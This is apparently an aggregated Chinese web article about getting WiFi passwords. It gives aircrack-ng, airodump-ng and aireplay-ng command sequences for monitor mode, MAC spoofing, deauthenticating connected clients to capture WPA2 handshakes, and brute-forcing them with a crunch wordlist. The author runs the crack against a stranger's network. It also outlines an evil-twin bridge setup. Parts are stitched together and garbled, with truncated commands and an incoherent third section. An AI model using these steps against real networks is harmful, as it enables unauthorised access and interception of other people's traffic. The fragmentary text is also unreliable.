wireshark获取wifi密码

大家好,感谢邀请,今天来为大家分享一下wireshark获取wifi密码的问题,以及和怎么获取wifi密码的一些困惑,大家要是还不太明白的话,也没有关系,因为接下来将为大家分享,希望可以帮助到大家,解决大家的问题,下面就开始吧!

一、5.无线渗透 wpa wifi 破解

iw dev wlan0mon set channel 4更改所在信道为4

iwlist wlan0mon channel查看 wlan0mon所在的信道所在信道要与要抓的信道在同一信道

iw dev wlan0 scan| grep SSID扫描附近的 ap(WiFi)

iw dev wlan0 scan| egrep"DS\ Parameter\ set|SSID"可以筛选出在地基信道

iw dev wlan0 interface add wlan0mon type monitor添加可以监听的网卡接口注意wlan0,是你自己的无线网卡用 iwconfig可以查看可能是wlan1或者 wlan2之后就可以在 iwconfig里看到 wlan0mon(如果看不到尝试关闭 service network-manager stop服务)然后使用 ifconfig wlan0mon启动,之后就可以用wireshark进行抓包

iw dev wlan0mon interface del删除添加的网卡接口

service network-manager stop首先先关闭这个服务

airmon-ng check可以检查出有可能冲突的进程

airmon-ng check kill可以杀掉全部冲突进程

airmon-ng start wlan0 6在wlan0上启动侦听这个数字 6就是启动在哪个信道上监听可以不写和上面iw的命令没有区别

iwlist wlan0mon channel查看当前在第几信道

airmon-ng stop wlan0mon关闭监听然后再用 ifconfig wlan0 up启动无线网卡再使用 service network-manager start进行服务启动可以进行正常的使用

airodump-ng wlan0mon抓包默认抓取所有信道的包 airodump-ng wlan0-c 1这个数字1代表抓取1信道的包

airodump-ng wlan0mon-c 1--bssid 00:11:22:33:44:55-w filename.cap--ivs后面这些每一个都是可以省略的--bssid代表只抓取这个 ap的包-w文件名可以把抓到的包保存成文件--ivs代表只抓 wep加密的包

包注入注意让自己和目标在同一信道

如果发包是要伪造源地址可以用 macchanger-m 00:11:22:33:44:55 wlan0mon将自己的mac地址与要伪造的地址改成相同

aireplay-ng-9 wlan0mon注包测试如果不成功可以运行 ifconfig wlan0mon up试试

这时网络中会有两个相同mac的设备会有丢包

如果WiFi只使用mac地址过滤没有密码你就可以连接上了,可以配合破解的WiFi密码进行使用破解的WiFi密码加上mac地址伪造连接有密码有mac绑定的 WiFi

比较简单只要抓到足够多的包就能完全破解

如果有用户已经连接上可以使他断线重连就能得到握手包(千万别傻等别人连接)

然后将大量的密码字典放进握手包里计算看看是不是对的密码使用这种方式要用显卡跑会快很多,也可以去淘宝找人跑包

使用上面这个命令后用 ifconfig-a可以查看到多出了一个网卡叫 at0下一步就是把at0和 eth0(就是连接外网的网卡如果是用WiFi就是wlan0之类的)桥接起来

apt-get install bridge-utils桥接网卡工具包

桥接接口的成员接口就是eth0和 at0是不能有ip地址的所以分别使用

来启动这两个接口 IP地址是0.0.0.0

ifconfig bridge 192.168.1.10 up

给上面创建的桥接网卡一个ip地址并up起来这个IP地址使用上面eth0的IP地址

添加一个网关目的是让连接到黑客开启的WiFi的用户可以直接到现实路由中获取ip地址

echo 1>/proc/sys/net/ipv4/ip_forward

cat/proc/sys/net/ipv4/ip_forward确认修改完成

git clone

wifi-pumpkin不是之前的3vilTwinAttacker看最后安装完成的命令行红色的字执行这个命令在终端

二、aircrack-ng+crunch暴力破解WIFI密码

    在家里闲来无事,便研究了一下怎么破解wifi密码,也算有点成就感.本文章争取通俗笼统,尽量保证让新手也能看懂,当然完全没Linux基础还是先去坐着吧。

不要对其中的命令死记硬背,先要把原理和步骤搞清楚

1.打开WIFI,但是要断开wifi连接,防止后面出现错误

2. airmon-ng 查看支持监控(moniter)的网卡,我的是wlan0,每个人可能会不同,按你的实际名称来(图1)

3. airmon-ng start wlan0 开启该网卡监控模式(moniter),网卡名称变为wlan0mon,之后写网卡名称时不要错写成wlan0!我用airmon-ng命令重新确认了一下(图2)

4. airodump-ng wlan0mon 使用该网卡开始扫描,显示一大批wifi热点,都是WPA2加密模式,差不多选择完目标后可选择Ctrl+c停止扫描(图3)

5. airodump--bssid  该wifi的bssid  --channel 该wifi的信道  --write 把捕获的包放到哪里   wlan0mon (图4)

airodump--bssid 34:80:B3:3C:FD:49 --channel  6 --write  xiaomi  wlan0mon  (建议先创建一个目录,在该目录下运行此命令)

6.发现连接该wifi的有一台设备,我们需要获取该wifi的用户认证包,你可以一直等他下次重新上线,当然我们没那么有耐心,于是就有了下一个命令aireplay-ng(图4)

7. aireplay-ng-0 3-a 该wifi的bssid  -c连接该wifi的用户设备station  wlan0mon (图5右侧)

(-0表示发送解除认证,让该设备重新连接以获取认证包,3表示发送3次,当该数为0时表示无限次,-a表示access point,-c表示client)

运行该命令后图5左边窗口出现【WPA handshake:......】说明抓到了认证包,可以与图4对比一下。完成之后记得用 airmon-ng stop wlan0mon关闭网卡监听模式!

8.此步骤为额外步骤,可不进行。

我用wireshark打开捕获的包xiao.cap,点Protoco进行分类,确实发现了认证包

9.有了认证包之后,我们破解还需要字典,一般人密码会用八位数字组成,于是我用crunch创建8位纯数字组成的字典,有837MB大小,对crunch工具不了解的自行百度

crunch 8 8-f/usr/share/crunch/charset.lst numeric-o wordlist.txt

调用密码库文件 charset.lst, 生成最小为8,最大为8,元素为密码库 charset.lst中 numeric的项目,并保存为 wordlist.txt;其中 charset.lst在kali_linux的目录为 /usr/share/crunch/charset.lst,-o:用于指定输出字典文件的位置。

>想了解更多可以vim /usr/share/crunch/charset.lst查看所有密码库

10. aircrack-ng  捕获的.cap包  -w密码字典

因为是自己随便找的wifi,所以用暴力破解看运气,很耗时间,所以我干脆把他放到租的云服务器里让他自个去运行,反正现在云服务器很便宜,用上screen命令让其在用户退出登陆时继续运行(不了解screen工具的自行百度,一个很好用的工具)

三、怎么获取wifi密码

现在,越来越多的人使用wifi上网,但有时候我们会遇到陌生wifi,这时候我们就需要获取wifi密码。下面是一些方法,帮助你获取陌生wifi密码。

下载并安装密码破解软件,如Aircrack-ng、Wireshark等。

打开软件并扫描可用的wifi网络。

选择目标wifi网络并开始捕获数据包。

等待一段时间后,停止捕获数据包并分析数据。

在地址栏中输入路由器的IP地址,通常是192.168.1.1或192.168.0.1。

输入用户名和密码登录路由器管理界面。

找到wifi设置选项并查看wifi密码。

找到wifi拥有者并礼貌地询问wifi密码。

如果对方不愿意告诉你密码,可以试着提供一些交换条件,如帮忙做一些事情。

如果对方仍然不愿意告诉你密码,就要尊重对方的意愿,不要强求。

以上是获取陌生wifi密码的几种方法,但需要注意的是,未经授权获取他人wifi密码是违法行为,应该遵守法律法规,不要进行非法操作。

OK,本文到此结束,希望对大家有所帮助。

本文标签: 相关标签:

本站内容除原创之外,部分内容来自网友供稿或收集于网络,如侵犯了您的权益, 请联系我们,本站将立刻删除!

本文链接:https://www.myxinmei.com/wifi-6367.html